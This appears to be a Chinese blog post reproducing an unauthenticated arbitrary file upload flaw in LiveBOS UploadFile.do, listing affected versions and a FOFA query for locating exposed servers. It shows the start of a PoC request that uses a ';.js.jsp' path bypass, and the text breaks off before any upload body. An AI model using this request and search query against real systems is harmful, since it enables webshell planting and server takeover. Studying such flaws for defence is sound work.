热门标签
热门文章
- 1【图文并茂】【一篇搞定】yolov5训练自己的数据集(交通训练集)_yolov5 数据集交通 下载
- 2数字(智)化采购系统优点_亮点_应用场景
- 3yolov8的TensorRT部署(C++版本)_yolov8 c++
- 4PhotoshopCC2019制作表情包_ps2019 表情包
- 5关于Python 创建TCP服务器的方法_python tcp server
- 6如何用六步教会你使用python爬虫爬取数据_python如何爬取资源
- 7Redis 远程连接,基本命令_redis远程连接
- 8CMS简介_cms 简介
- 9电话机器人、电销、外呼系统与回拨系统:销售业绩飙升的秘诀!_电销系统人工电销
- 10Comsol偏振不依赖BIC超表面。目前为止,超表面获取BIC的方式通常为打破结构对称性_bic打破c2对称性
当前位置: article > 正文
LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)_livebos漏洞
作者:weixin_40725706 | 2024-08-19 22:43:05
赞
踩
livebos漏洞
0x01 产品简介
LiveBOS(Live Business Object System)是顶点软件自主研发的以业务对象建模为核心的业务中间件及其集成开发工具,它通过业务模型建立直接完成软件开发的创新模式,支持各类基于WEB的专业应用软件与行业大型应用的开发。LiveBOS系统由三个相对独立的产品构成:运行支持支撑平台LiveBOS Server、开发集成环境LiveBOS Studio以及运维管理工具LiveBOS Manager。
0x02 漏洞概述
LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
0x03 影响范围
福建顶点软件股份有限公司-LiveBos <= 3.9.0
0x03 复现环境
FOFA:
body="Power by LiveBOS"
0x04 漏洞复现
PoC
- POST /feed/UploadFile.do;.js.jsp HTTP/1.1
- Host:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
- Connection: close
-
- --
推荐阅读
相关标签
